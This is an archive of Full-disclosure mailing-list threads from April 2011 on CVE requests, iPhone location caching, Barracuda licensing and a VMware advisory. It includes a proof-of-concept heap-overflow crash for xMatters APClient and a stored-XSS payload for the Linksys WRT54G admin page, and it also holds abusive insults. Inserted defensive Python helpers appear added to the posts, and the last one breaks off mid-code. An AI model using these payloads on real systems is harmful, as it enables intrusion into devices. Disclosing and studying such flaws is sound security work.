Re: [Full-disclosure] Requesting/Reserving CVE Question

2011-04-28 Thread Marcus Meissner
On Thu, Apr 28, 2011 at 06:42:13PM +0300, Henri Salo wrote:
> On Thu, Apr 28, 2011 at 09:14:57AM -0600, ctrun...@christophertruncer.com 
> wrote:
> > Hello all,
> > 
> > First off, if this isn't the place to ask this question, I apologize, and
> > feel free to ignore this e-mail.  
> > 
> > I've found a couple vulnerabilities in a web forum/portal/etc. product
> > called IP.Board.  I was looking to reserve a CVE number, and I attempted to
> > contact the address Mitre lists for reserving one, however, it's been
> > nearly a month and I have not received anything back from them.  This is
> > the first vulnerability I have found, and have never requested/reserved a
> > CVE before, so I am a little unfamiliar with the process (although based
> > off of the following website, it looks like all I need to do is send an
> > e-mail to them - http://cve.mitre.org/cve/obtain_id.html).  
> > 
> > I've sent follow-up e-mails and I've received no response.  My
> > question to you all is: how long does this process take?  Is there something
> > else that should be done, or someone else the request should be sent to?
> > What's the normal time frame from requesting a CVE number to hearing back
> > from them?
> > 
> > Thanks for any help/info/advice.  I appreciate it.
> > 
> > Chris
> 
> No luck. With open-source you could have tried:
> http://oss-security.openwall.org/wiki/mailing-lists/oss-security

The oss-security list only handles open-source software, which IP.Board does not
appear to be.

As for Mitre, just resend the e-mail; they usually answer at some point in time.
(They seem to be overworked, so it's not just you.)

A simple e-mail requesting one as explained in obtain_id.html should work.

Ciao, Marcus

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] iPhone Geolocation storage

2011-04-28 Thread Christian Sciberras
Speak about bullshit. Tomtom has that listed in their EULA, unlike Apple
(who needs an EULA when fanboys follow blindly?)
Besides which, the police can already be granted (upon request) access to
servers (where your data is already stored in plain text), so I don't see
the big deal.

But hey, if a fridge or a microwave oven is spying on you, it must make big
news. Bigger of course than retards wasting time on Youtube anyway.





On Fri, Apr 29, 2011 at 1:39 AM, Ivan .  wrote:

> and now tom tom as well
>
>
> http://crave.cnet.co.uk/cartech/tomtom-admits-to-sending-your-routes-and-speed-information-to-the-police-50003618/
>
> On Thu, Apr 28, 2011 at 9:35 AM, Ivan .  wrote:
> > stevie says it just a bug, a patented bug
> >
> >
> http://gawker.com/?_escaped_fragment_=5795442/apple-patent-reveals-extensive-stalking-plans#!5795442/apple-patent-reveals-extensive-stalking-plans
> >
> > On Wed, Apr 27, 2011 at 8:46 PM,   wrote:
> >>> M$ are in the love in
> >>>
> >>> http://news.cnet.com/8301-31921_3-20057329-281.html
> >>>
> >>> On Tue, Apr 26, 2011 at 8:12 PM, Ivan .  wrote:
> >>>
>  Interesting write up, and apparently old news
> 
> 
> >>
> >> If you have jailbroken your phone, just use cydia and search for tool
> >> 'Untrackerd' to fix this issue. This background process reset the file
> >> periodically.
> >>
> >> I have always said this, after you have JB'd your iPhone, then it
> becomes
> >> a phone :) I hated that apple's bullshit where your phone is completely
> >> tied to itunes unless you jailbroke.
> >>
> 
> https://alexlevinson.wordpress.com/2011/04/21/3-major-issues-with-the-latest-iphone-tracking-discovery/
> 
>  On Fri, Apr 22, 2011 at 1:59 PM, mark seiden  wrote:
> 
> > yes, that's right.  on one of the forensics lists someone pointed out
> > that
> > he started google maps for 6 seconds
> > and ended up with 1253 locations in the cache, all with the same time
> > stamp.  those would be potential known
> > locations in your neighborhood.
> >
> > much fuller disclosure in
> >
> > http://markey.house.gov/docs/applemarkeybarton7-12-10.pdf
> >
> > including that the some of the location data comes from google.
> >
> > it looks like everything gets anonymized, aggregated to 5 digit
> > zipcodes,
> > and max retention of 6 months, but don't
> > talk much about what the device does except when it uploads data.
> >
> > the congressional disclosure, while it makes me feel better about
> > location
> > data, contains a few choice items like
> >
> >
> >
> > it's unclear how apple can keep app developers from retaining
> location
> > data.  which doesn't seem forbidden by apple, only by law.
> >
> > it's also unclear why they keep really old data in the cache on the
> > phone.
> >  cache bloat results for little benefit.
> >
> > the android doesn't do time-based pruning either and has a similar
> > location cache with the same data it.
> >
> > it appears to me that since the keying is by mac address or the tower
> > id
> > that there will only be one timestamped item for
> > each of those.  so if you go around the same neighborhood repeatedly,
> > the
> > same data will be in the cache.   so not exactly
> > tracking, just recency.
> >
> > but it would seem prudent to both specify and implement the briefest
> > retention of the location data that was possible to perform
> > the function expected by the user.
> >
> >
> > On Apr 20, 2011, at 12:34 PM, Brandon Matthews wrote:
> >
> > >
> > > I've been poring over my phone's data, and I'm not sure if the
> > resolution is
> > > just very low, or if it's logging the locations of towers and not
> my
> > phone.
> > >
> > > Ex: http://imgur.com/2m5tO
> > >
> > > I'm going to xref with FCC databases soon to try and find out.
> > >
> > > B
> > >
> > > (Not speaking for Cisco, only for myself and with nobody's
> approval)
> > >
> > > On 4/20/11 12:11 PM, "Michele Orru"  did
> > declare:
> > >
> > >> Already twitted today.
> > >> Pretty scary btw. I hope there's not the equivalent for Android.
> > >>
> > >> antisnatchor
> > >>
> > >>>
> >
> 
> > >>>
> > >>> Thor (Hammer of God) 
> > >>> April 20, 2011 9:05 PM
> > >>>
> > >>>
> > >>> For those of you who have not seen this yet:
> > >>>
> > >>> http://radar.oreilly.com/2011/04/apple-location-tracking.html
> > >>>

Re: [Full-disclosure] Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient

2011-04-28 Thread Mario Vilas
Precisely. The poc triggers the bug by passing a very long command line
argument, so it's assumed the attacker already has executed code. The only
way this is exploitable is if the binary has suid (then the attacker can
elevate privileges) or the command can be executed remotely (and the
attacker additionally cannot execute any other commands, but can mysteriously
control the arguments). Unless either scenario is researched (and nothing in
the advisory tells me so) I call bullshit.

On Thu, Apr 28, 2011 at 6:09 PM,  wrote:

> On Thu, 28 Apr 2011 14:40:22 -0300, Mario Vilas said:
>
> > Is the suid bit set on that binary? Otherwise, unless I'm missing
> something
> > it doesn't seem to be exploitable by an attacker...
>
> Who cares?  You got code executed on the remote box, that's the *hard*
> part.
> Use that to inject a callback shell or something, use *that* to get
> yourself a shell
> prompt.  At that point, download something else that exploits you to root -
> if
> you even *need* to, as quite often the Good Stuff is readable by non-root
> users.
>



-- 
“There's a reason we separate military and the police: one fights the enemy
of the state, the other serves and protects the people. When the military
becomes both, then the enemies of the state tend to become the people.”

Re: [Full-disclosure] Barracuda backdoor

2011-04-28 Thread Valdis . Kletnieks
On Thu, 28 Apr 2011 19:18:59 +0300, Tõnu Samuel said:

> From: Chelsi Newland [mailto:cnewl...@barracuda.com] 
> Sent: Wednesday, April 27, 2011 5:51 PM
> Subject: FW: Current (Expires 2011-11-21)
> Importance: High
>
>
> Please note we have proof of payment to you from the end user.  Either
> reimburse this customer, or send payment for this order.
>
> Please advise payment on your account so we can enable their unit.
>
> Sincerely,
>
> Chelsi Newland| Barracuda Networks | Credit/Collections Manager

You *do* realize that isn't proof of anything other than "show us the money or
we turn off the subscription features" - which is a known common and well
documented practice (see the NANOG thread I referenced).  I don't see anything
here that says they went out of their way to *totally* break the unit.




Re: [Full-disclosure] Stress Testing Tools

2011-04-28 Thread Gaurang Pandya
I have generated around 4G of attack traffic using Hping from 6 servers, and I could
have still increased it, but that was all I needed. So I think hping does a good
job..

Gaurang.





From: Oscar 
To: Sec Tools 
Cc: full-disclosure@lists.grok.org.uk
Sent: Wed, April 27, 2011 5:44:14 PM
Subject: Re: [Full-disclosure] Stress Testing Tools

Hi,

I am also on the verge of testing firewall/IDS/IPS; currently I am looking at
some DOS/DDOS/stress testing tools.. Please help me on that..

Thanks in Advance
Oscar


On Wed, Apr 27, 2011 at 11:17 AM, Sec Tools  wrote:

> I've been using a combination of Mausezahn (
> http://www.perihel.at/sec/mz/index.html ), Tcpreplay (
> http://tcpreplay.synfin.net ) and sometimes Scapy (
> http://www.secdev.org/projects/scapy/ ) for our 1G/10G network stress testing
> needs ( mostly for probing and checking the resilience of new network
> appliances ).
>
> I noted that these tools were not updated recently (for one year approx). Do
> you guys have any suggestions on better approaches / really good new tools to do
> this? ( note that currently our budget does not allow the use of hardware
> based solutions ).
>
> Best Regards,
>
> John James
> http://sectools.org/

Re: [Full-disclosure] Barracuda backdoor

2011-04-28 Thread bk

> On Fri, Apr 29, 2011 at 3:17 AM, bk  wrote:
> On Apr 28, 2011, at 3:09 AM, Tõnu Samuel wrote:
> 
> > One day their Barracuda product stopped working.
> >
> > After investigating problem it came out that Barracuda reseller and
> > Barracuda itself have some misunderstandings and because of this
> > Barracuda not only disabled all kind of subscription services
> 
> Your unsubstantiated claims don't bear repeating.  I will however point out 
> that many vendors disable some portion of functionality when subscription or 
> support payments lapse.  This is widely done in the industry and a surprise 
> to no one.
> 
> --
> chort

On Apr 28, 2011, at 7:20 PM, Cal Leeming wrote:

> Name ten.

For starters, every anti-spam company ever.  I should know, I've worked for 
half of them.  At the very least you cannot get upgrades or patches of any 
kind.  Most of them disable anti-spam updates, all of them disable anti-virus 
updates, and some even disable anti-spam scanning entirely.  The anti-spam SaaS 
vendors I know of will disable accepting your mail after a grace period if you 
haven't moved your MX records.

Hmm, let's see.  Firewall vendors won't let you apply updates, some of them 
cripple VPN functionality when your license has expired... really, do we need 
to go on?  There's a long precedent for products going into a degraded mode if 
your subscription or license expires.

--
chort



Re: [Full-disclosure] Barracuda backdoor

2011-04-28 Thread bk
On Apr 28, 2011, at 3:09 AM, Tõnu Samuel wrote:

> One day their Barracuda product stopped working.
> 
> After investigating problem it came out that Barracuda reseller and 
> Barracuda itself have some misunderstandings and because of this 
> Barracuda not only disabled all kind of subscription services 

Your unsubstantiated claims don't bear repeating.  I will however point out 
that many vendors disable some portion of functionality when subscription or 
support payments lapse.  This is widely done in the industry and a surprise to 
no one.

--
chort


Re: [Full-disclosure] iPhone Geolocation storage

2011-04-28 Thread Ivan .
and now tom tom as well

http://crave.cnet.co.uk/cartech/tomtom-admits-to-sending-your-routes-and-speed-information-to-the-police-50003618/

On Thu, Apr 28, 2011 at 9:35 AM, Ivan .  wrote:
> stevie says it just a bug, a patented bug
>
> http://gawker.com/?_escaped_fragment_=5795442/apple-patent-reveals-extensive-stalking-plans#!5795442/apple-patent-reveals-extensive-stalking-plans
>
> On Wed, Apr 27, 2011 at 8:46 PM,   wrote:
>>> M$ are in the love in
>>>
>>> http://news.cnet.com/8301-31921_3-20057329-281.html
>>>
>>> On Tue, Apr 26, 2011 at 8:12 PM, Ivan .  wrote:
>>>
 Interesting write up, and apparently old news


>>
>> If you have jailbroken your phone, just use cydia and search for tool
>> 'Untrackerd' to fix this issue. This background process reset the file
>> periodically.
>>
>> I have always said this, after you have JB'd your iPhone, then it becomes
>> a phone :) I hated that apple's bullshit where your phone is completely
>> tied to itunes unless you jailbroke.
>>
 https://alexlevinson.wordpress.com/2011/04/21/3-major-issues-with-the-latest-iphone-tracking-discovery/

 On Fri, Apr 22, 2011 at 1:59 PM, mark seiden  wrote:

> yes, that's right.  on one of the forensics lists someone pointed out
> that
> he started google maps for 6 seconds
> and ended up with 1253 locations in the cache, all with the same time
> stamp.  those would be potential known
> locations in your neighborhood.
>
> much fuller disclosure in
>
> http://markey.house.gov/docs/applemarkeybarton7-12-10.pdf
>
> including that the some of the location data comes from google.
>
> it looks like everything gets anonymized, aggregated to 5 digit
> zipcodes,
> and max retention of 6 months, but don't
> talk much about what the device does except when it uploads data.
>
> the congressional disclosure, while it makes me feel better about
> location
> data, contains a few choice items like
>
>
>
> it's unclear how apple can keep app developers from retaining location
> data.  which doesn't seem forbidden by apple, only by law.
>
> it's also unclear why they keep really old data in the cache on the
> phone.
>  cache bloat results for little benefit.
>
> the android doesn't do time-based pruning either and has a similar
> location cache with the same data it.
>
> it appears to me that since the keying is by mac address or the tower
> id
> that there will only be one timestamped item for
> each of those.  so if you go around the same neighborhood repeatedly,
> the
> same data will be in the cache.   so not exactly
> tracking, just recency.
>
> but it would seem prudent to both specify and implement the briefest
> retention of the location data that was possible to perform
> the function expected by the user.
>
>
> On Apr 20, 2011, at 12:34 PM, Brandon Matthews wrote:
>
> >
> > I've been poring over my phone's data, and I'm not sure if the
> resolution is
> > just very low, or if it's logging the locations of towers and not my
> phone.
> >
> > Ex: http://imgur.com/2m5tO
> >
> > I'm going to xref with FCC databases soon to try and find out.
> >
> > B
> >
> > (Not speaking for Cisco, only for myself and with nobody's approval)
> >
> > On 4/20/11 12:11 PM, "Michele Orru"  did
> declare:
> >
> >> Already twitted today.
> >> Pretty scary btw. I hope there's not the equivalent for Android.
> >>
> >> antisnatchor
> >>
> >>>
> 
> >>>
> >>> Thor (Hammer of God) 
> >>> April 20, 2011 9:05 PM
> >>>
> >>>
> >>> For those of you who have not seen this yet:
> >>>
> >>> http://radar.oreilly.com/2011/04/apple-location-tracking.html
> >>>

Re: [Full-disclosure] Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient

2011-04-28 Thread ichib0d crane
Any reason for the hostility? The Nigerian thing was ages ago and out
of curiosity, and I don't see how my choice of school is relevant in
the situation. Where's this six month deal coming from, and when did I
ever say I even counted myself as a hacker?

All I'm saying is InsectPro did poor documentation and poor
investigation into the "vulnerability".

On Thu, Apr 28, 2011 at 3:11 PM, ghost  wrote:
> So in 6 short months you've become a master hacker huh Gage ? All that
> reporting "nigerian scammers" really put you to the top of the hacker
> echelon ?  or is it cause you finally got a piece of paper as
> "recognition" from your little school ?
>
> In short; Shut the fuck up and go play in traffic, kid.
>
>
> On Thu, Apr 28, 2011 at 2:39 PM, ichib0d crane  
> wrote:
>> This isn't a zero day. This is a vulnerability. Being able to crash
>> the system is nothing compared to the effort needed to actually write
>> the exploit. What function is the heap overflow in? Did you guys even
>> bother to find out? How do I know this is even a heap overflow? Heck,
>> you couldn't even overwrite a single register! How effective are
>> standard mitigations on the target? Are there even any? (If there isn't
>> and you couldn't overwrite a single reg, there's something wrong with
>> you.)
>>
>> Cool fuzz story bro, tell it again, but a quick fuzz doesn't drop zero
>> days. A smart exploit WRITER drops zero days.
>>
>> Come back once you stop being an amateur.
>>
>



Re: [Full-disclosure] Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient

2011-04-28 Thread ghost
So in 6 short months you've become a master hacker huh Gage ? All that
reporting "nigerian scammers" really put you to the top of the hacker
echelon ?  or is it cause you finally got a piece of paper as
"recognition" from your little school ?

In short; Shut the fuck up and go play in traffic, kid.


On Thu, Apr 28, 2011 at 2:39 PM, ichib0d crane  wrote:
> This isn't a zero day. This is a vulnerability. Being able to crash
> the system is nothing compared to the effort needed to actually write
> the exploit. What function is the heap overflow in? Did you guys even
> bother to find out? How do I know this is even a heap overflow? Heck,
> you couldn't even overwrite a single register! How effective are
> standard mitigations on the target? Are there even any? (If there isn't
> and you couldn't overwrite a single reg, there's something wrong with
> you.)
>
> Cool fuzz story bro, tell it again, but a quick fuzz doesn't drop zero
> days. A smart exploit WRITER drops zero days.
>
> Come back once you stop being an amateur.
>



Re: [Full-disclosure] Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient

2011-04-28 Thread ichib0d crane
This isn't a zero day. This is a vulnerability. Being able to crash
the system is nothing compared to the effort needed to actually write
the exploit. What function is the heap overflow in? Did you guys even
bother to find out? How do I know this is even a heap overflow? Heck,
you couldn't even overwrite a single register! How effective are
standard mitigations on the target? Are there even any? (If there isn't
and you couldn't overwrite a single reg, there's something wrong with
you.)

Cool fuzz story bro, tell it again, but a quick fuzz doesn't drop zero
days. A smart exploit WRITER drops zero days.

Come back once you stop being an amateur.



Re: [Full-disclosure] Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient

2011-04-28 Thread Valdis . Kletnieks
On Thu, 28 Apr 2011 14:40:22 -0300, Mario Vilas said:

> Is the suid bit set on that binary? Otherwise, unless I'm missing something
> it doesn't seem to be exploitable by an attacker...

Who cares?  You got code executed on the remote box, that's the *hard* part.
Use that to inject a callback shell or something, use *that* to get yourself a 
shell
prompt.  At that point, download something else that exploits you to root - if
you even *need* to, as quite often the Good Stuff is readable by non-root
users.



Re: [Full-disclosure] Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient

2011-04-28 Thread Mario Vilas
Is the suid bit set on that binary? Otherwise, unless I'm missing something
it doesn't seem to be exploitable by an attacker...

On Thu, Apr 28, 2011 at 12:03 PM, Juan Sacco
wrote:

>  Information
>  
>  Name : Heap Buffer Overflow in xMatters AlarmPoint APClient
>  Version: APClient 3.2.0 (native)
>  Software : xMatters AlarmPoint
>  Vendor Homepage : http://www.xmatters.com
>  Vulnerability Type : Heap Buffer Overflow
>  Md5: 283d98063323f35deb7afbd1db93d859  APClient.bin
>  Severity : High
>  Researcher : Juan Sacco 
>
>  Description
>  --
>  The AlarmPoint Java Server consists of a collection of software
>  components and software APIs designed to provide a flexible and
>  powerful set of tools for integrating various applications to
>  AlarmPoint.
>
>  Details
>  ---
>  AlarmPoint APClient is affected by a Heap Overflow vulnerability in
>  version APClient 3.2.0 (native)
>
>  A heap overflow condition is a buffer overflow, where the buffer that
>  can be overwritten is allocated in the heap portion of memory, generally
>  meaning that the buffer was allocated using a routine such as the POSIX
>  malloc() call.
>  https://www.owasp.org/index.php/Heap_overflow
>
>
>  Exploit as follow:
>  Submit a malicious file containing the exploit
>  root@ea-gateway:/opt/alarmpointsystems/integrationagent/bin$
>  ./APClient.bin --submit-file maliciousfile.hex
>  or
>  (gdb) run `python -c 'print "\x90"*16287'`
>  Starting program:
>  /opt/alarmpointsystems/integrationagent/bin/APClient.bin `python -c
>  'print "\x90"*16287'`
>
>  Program received signal SIGSEGV, Segmentation fault.
>  0x0804be8a in free ()
>  (gdb) i r
>  eax            0xa303924   170932516
>  ecx            0xbfb8      49080
>  edx            0xa303924   170932516
>  ebx            0x8059438   134583352
>  esp            0xbfff3620  0xbfff3620
>  ebp            0xbfff3638  0xbfff3638
>  esi            0x8059440   134583360
>  edi            0x80653f0   134632432
>  eip            0x804be8a   0x804be8a
>  eflags 0x210206 [ PF IF RF ID ]
>  cs 0x73 115
>  ss 0x7b 123
>  ds 0x7b 123
>  es 0x7b 123
>  fs 0x0  0
>  gs 0x33 51
>  (gdb)
>
>
>  Solution
>  ---
>  No patch is available at this time.
>
>  Credits
>  ---
>  Manually discovered by Insecurity Research Labs
>  Juan Sacco - http://www.insecurityresearch.com
>
> --
>  --
>  _
>  Insecurity Research - Security auditing and testing software
>  Web: http://www.insecurityresearch.com
>  Insect Pro 2.5 was released, stay tuned
>



-- 
“There's a reason we separate military and the police: one fights the enemy
of the state, the other serves and protects the people. When the military
becomes both, then the enemies of the state tend to become the people.”
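The privilege-boundary check that Mario's suid question (asked twice in this thread) turns on, as an added example rather than anything from the advisory or from xMatters: a crash driven by a local command-line argument only matters if the binary runs with privileges the caller does not already have, so the triage classifies a binary by its set-id bits and owner and lists any other set-id files under its install tree. The APClient.bin path is taken from the advisory's gdb session and used only as a default; the function names and classification labels are assumptions.

```python
import os
import stat

# Path from the advisory's gdb session, used only as a default argument.
DEFAULT_BINARY = "/opt/alarmpointsystems/integrationagent/bin/APClient.bin"


def classify_privilege_boundary(mode: int, owner_uid: int) -> str:
    """Map a file's mode bits and owner to what a local caller who controls
    the binary's argv would gain by corrupting it.

    Returns one of (labels are this example's own):
      'suid-root' - runs as uid 0 for any caller: argv control crosses a
                    privilege boundary and the crash deserves full analysis
      'suid-user' - runs as another non-root account: a lateral boundary
      'sgid'      - gains only the owning group's privileges
      'none'      - no set-id bits: the caller already has everything the
                    process has, so a local argv crash is a reliability bug
    """
    if mode & stat.S_ISUID:
        return "suid-root" if owner_uid == 0 else "suid-user"
    if mode & stat.S_ISGID:
        return "sgid"
    return "none"


def triage_binary(path: str = DEFAULT_BINARY) -> dict:
    """Stat one binary and report the classification with the facts it rests on."""
    st = os.stat(path)
    return {
        "path": path,
        "mode": stat.filemode(st.st_mode),
        "owner_uid": st.st_uid,
        "owner_gid": st.st_gid,
        "world_executable": bool(st.st_mode & stat.S_IXOTH),
        "boundary": classify_privilege_boundary(st.st_mode, st.st_uid),
    }


def find_setid_files(root: str) -> list:
    """Walk an install tree and return (path, classification) for every
    regular file carrying a setuid or setgid bit, the equivalent of
    find ROOT -type f \\( -perm -4000 -o -perm -2000 \\)."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue  # unreadable entries are skipped, not fatal
            if not stat.S_ISREG(st.st_mode):
                continue
            cls = classify_privilege_boundary(st.st_mode, st.st_uid)
            if cls != "none":
                found.append((full, cls))
    return sorted(found)


if __name__ == "__main__":
    import sys

    target = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_BINARY
    if os.path.exists(target):
        print(triage_binary(target))
        print(find_setid_files(os.path.dirname(target)))
    else:
        print(f"{target} not present on this host")
```

Run it against the installed binary; a 'none' verdict means the PoC's local crash stays a reliability bug unless some service invokes the binary with caller-supplied arguments, which the script cannot see.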

Re: [Full-disclosure] Barracuda backdoor

2011-04-28 Thread Marsh Ray
On 04/28/2011 05:51 AM, Tõnu Samuel wrote:
> On Thu, 2011-04-28 at 11:45 +0100, Benji wrote:
>> Do you actually have any evidence of a backdoor? Or could this just be
>> a remote 'turn-off' switch as such? I'm not saying that one is better
>> than the other, but they are very different features.
>
> I have no idea how this technically is implemented or what they can do
> else. This is clear example of closed source product dangers. Today we
> found some "switch off", tomorrow what?

Tomorrow Barracuda gets pwned and this turns into a cascade failure.

Oh wait, that happened two weeks ago:
   http://www.theregister.co.uk/2011/04/11/barracuda_networks_attack/

> How we can be sure about
> anything? Only thing I am sure now: they kept copy of keys to house you
> bought from them years ago and their used those keys for illegal thing.

Let's be careful though: just because your system stopped working 
doesn't mean it has a backdoor. It could have been implemented as simply 
a periodic "phone home for updates" which received some type of 
"license expired" message. A remote kill switch, for sure, but not 
necessarily the same as a back door.

It raises the question though of how many companies have that particular 
combination of ethics and self-discipline to implement one and not the 
other. It sometimes takes extra work to build a product that performs 
security functions in a customer's network without granting yourself 
unnecessary privilege on that network.

As we saw with RSA SecurID, many admins didn't realize that the vendor 
might be keeping a copy of the keys. Sites with products on their 
networks may want to consider if Barracuda as an external vendor falls 
under the scope of their PCI requirements.

- Marsh


[Full-disclosure] Cisco Linksys WRT54G XSS Vulnerability

2011-04-28 Thread Justin Klein Keane

Description of Vulnerability:
-----------------------------
Linksys WRT54G is a consumer wireless G broadband router and four port
switch (http://www.linksysbycisco.com/ANZ/en/support/WRT54G).  The
device provides an administration interface for configuration via a web
browser.  Unfortunately the interface does not sanitize keywords for
safe browsing leading to a stored/persistent cross site scripting (XSS)
vulnerability.

Systems affected:
-----------------
Cisco Linksys Wireless G Broadband Router WRT54G with firmware version
4.21.1 was tested and found to be vulnerable.

Proof of Concept:
-----------------
1.  Log into the WRT54G administration screen and navigate to /Filters.asp
2.  Enter "' onBlur='alert("xss")" for the "Website Blocking by Keyword"
value.
3.  Click the 'Save Settings' button at the bottom of the form, ignore
the error and click 'Continue'
4.  After the page refreshes click on the "Website Blocking by Keyword"
textfield then click outside to view the JavaScript alert

-- 
Justin Klein Keane
http://www.MadIrish.net

The digital signature on this e-mail may be confirmed using the
PGP key located at: http://www.madirish.net/gpgkey

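The defect behind this advisory and its fix, as an added example that is not Linksys firmware code: a template that inserts the stored keyword into a single-quoted attribute verbatim beside one that applies HTML attribute encoding, plus a small attribute scanner showing that the advisory's PoC string yields an event-handler attribute only in the unencoded form. The input markup is an assumption; the real Filters.asp page is not reproduced.

```python
import html
import re

# Constructed input: the keyword string from the advisory's proof of concept.
POC_KEYWORD = "' onBlur='alert(\"xss\")"

# Assumed markup for the "Website Blocking by Keyword" field.
FIELD_TEMPLATE = "<input type='text' name='keyword' value='{value}'>"


def render_unsafe(keyword: str) -> str:
    """Reproduces the defect: the stored keyword is inserted verbatim, so a
    single quote in it terminates the value attribute and the rest of the
    string becomes new attributes on the element."""
    return FIELD_TEMPLATE.format(value=keyword)


def render_safe(keyword: str) -> str:
    """Fix: HTML-attribute-encode the keyword before insertion.
    html.escape(quote=True) encodes & < > " and ', so the value can never
    close the quoted attribute, whatever the admin typed."""
    return FIELD_TEMPLATE.format(value=html.escape(keyword, quote=True))


# Matches name='...' or name="..." attribute pairs inside one tag.
_ATTR_RE = re.compile(r"""(\w+)=(?:'([^']*)'|"([^"]*)")""")


def parse_attributes(tag: str) -> dict:
    """Return the attribute name -> raw (still encoded) value map a browser
    would see for one tag. Duplicate names keep the first occurrence."""
    attrs = {}
    for m in _ATTR_RE.finditer(tag):
        value = m.group(2) if m.group(2) is not None else m.group(3)
        attrs.setdefault(m.group(1), value)
    return attrs


def injected_event_handlers(tag: str) -> list:
    """Names of on* attributes present in the tag. Any of these on a field
    that should only carry type/name/value means the stored input broke
    out of the attribute it was placed in."""
    return [n for n in parse_attributes(tag) if n.lower().startswith("on")]


def stored_value(tag: str) -> str:
    """Decode the value attribute the way a browser would, to confirm the
    encoded form still round-trips the keyword the admin entered."""
    return html.unescape(parse_attributes(tag).get("value", ""))


if __name__ == "__main__":
    for label, render in (("unsafe", render_unsafe), ("safe", render_safe)):
        tag = render(POC_KEYWORD)
        print(f"{label}: {tag}")
        print(f"  event handlers: {injected_event_handlers(tag)}")
        print(f"  value seen by browser: {stored_value(tag)!r}")
```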


[Full-disclosure] VMSA-2011-0007 VMware ESXi and ESX Denial of Service and third party updates for Likewise components and ESX Service Console

2011-04-28 Thread VMware Security Team

------------------------------------------------------------------------
   VMware Security Advisory

Advisory ID:   VMSA-2011-0007
Synopsis:  VMware ESXi and ESX Denial of Service and third party
   updates for Likewise components and ESX Service
   Console
Issue date:2011-04-28
Updated on:2011-04-28
CVE numbers:   CVE-2011-1785 CVE-2011-1786 CVE-2010-1324
   CVE-2010-1323 CVE-2010-4020 CVE-2010-4021
   CVE-2010-2240
------------------------------------------------------------------------

1. Summary

   VMware ESXi and ESX could encounter a socket exhaustion situation
   which may lead to a denial of service. Updates to Likewise components
   and to the ESX Service Console address security vulnerabilities.

2. Relevant releases

   VMware ESXi 4.1 without patch ESXi410-201104401-SG.
   VMware ESXi 4.0 without patch ESXi400-201104401-SG.

   VMware ESX 4.1 without patch ESX410-201104401-SG.
   VMware ESX 4.0 without patch ESX400-201104401-SG.

3. Problem Description

  a. ESX/ESXi Socket Exhaustion
 
   By sending malicious network traffic to an ESXi or ESX host an
   attacker could exhaust the available sockets which would prevent
   further connections to the host. In the event a host becomes
   inaccessible its virtual machines will continue to run and have
   network connectivity but a reboot of the ESXi or ESX host may be
   required in order to be able to connect to the host again.

   ESXi and ESX hosts may intermittently lose connectivity caused by
   applications that do not correctly close sockets. If this occurs an
   error message similar to the following may be written to the vpxa
   log:
   
   socket() returns -1 (Cannot allocate memory)

An error message similar to the following may be written to the
vmkernel logs:

   socreate(type=2, proto=17) failed with error 55

VMware would like to thank Jimmy Scott at inet-solutions.be for
reporting this issue to us.

The Common Vulnerabilities and Exposures Project (cve.mitre.org) has
assigned the name CVE-2011-1785 to this issue.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware    Product   Running  Replace with/
Product   Version   on       Apply Patch
========  ========  =======  ====================
vCenter   any       Windows  not affected

hosted *  any       any      not affected

ESXi      4.1       ESXi     ESXi410-201104401-SG
ESXi      4.0       ESXi     ESXi400-201104401-SG
ESXi      3.5       ESXi     not affected

ESX       4.1       ESX      ESX410-201104401-SG
ESX       4.0       ESX      ESX400-201104401-SG
ESX       3.5       ESX      not affected
ESX       3.0.3     ESX      not affected

  * hosted products are VMware Workstation, Player, ACE, Fusion.
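To spot the symptom described in 3a before the host becomes unreachable, a defender can watch the vpxa and vmkernel logs for the two messages quoted above. The following Python script is an added example, not part of the VMware advisory: it runs the two indicators over constructed sample log lines (the two error strings are the advisory's, everything else in the lines is made up) and reports hit counts per log. The alert threshold is an assumption for the example. As the advisory notes, the same messages can be produced by applications that fail to close sockets, so a hit is a reason to investigate the host, not proof of malicious traffic.

```python
import re
from collections import Counter

# Constructed sample log lines modelled on the two messages the advisory
# quotes. Timestamps, thread ids and the surrounding text are made up; only
# the two error strings themselves come from the advisory.
VPXA_LOG = """\
[2011-04-27 10:01:02.114 F6C5BB90 info 'App'] Creating temporary connect spec
[2011-04-27 10:01:02.115 F6C5BB90 error 'App'] socket() returns -1 (Cannot allocate memory)
[2011-04-27 10:01:07.301 F6C5BB90 error 'App'] socket() returns -1 (Cannot allocate memory)
[2011-04-27 10:01:12.498 F6C5BB90 error 'App'] socket() returns -1 (Cannot allocate memory)
"""

VMKERNEL_LOG = """\
Apr 27 10:01:01 vmkernel: 12:03:11:44.120 cpu2:4096)NetPort: 1226: enabled port 0x2000004
Apr 27 10:01:02 vmkernel: 12:03:11:45.003 cpu1:4099)socreate(type=2, proto=17) failed with error 55
Apr 27 10:01:07 vmkernel: 12:03:11:50.010 cpu1:4099)socreate(type=1, proto=6) failed with error 55
"""

# A constructed healthy log, used to show the negative case.
CLEAN_LOG = "[2011-04-27 10:05:00.000 F6C5BB90 info 'App'] heartbeat ok\n"

# Indicators taken verbatim from the advisory. The vmkernel one keeps the
# socket type and protocol as groups so the report can say which kinds of
# socket could no longer be created.
VPXA_INDICATOR = re.compile(r"socket\(\) returns -1 \(Cannot allocate memory\)")
VMK_INDICATOR = re.compile(r"socreate\(type=(\d+), proto=(\d+)\) failed with error 55")


def count_matches(text, indicator):
    """Number of log lines in which the indicator appears."""
    return sum(1 for line in text.splitlines() if indicator.search(line))


def failed_socket_kinds(vmk_text):
    """Counter of (type, proto) pairs from failed socreate() calls."""
    kinds = Counter()
    for line in vmk_text.splitlines():
        m = VMK_INDICATOR.search(line)
        if m:
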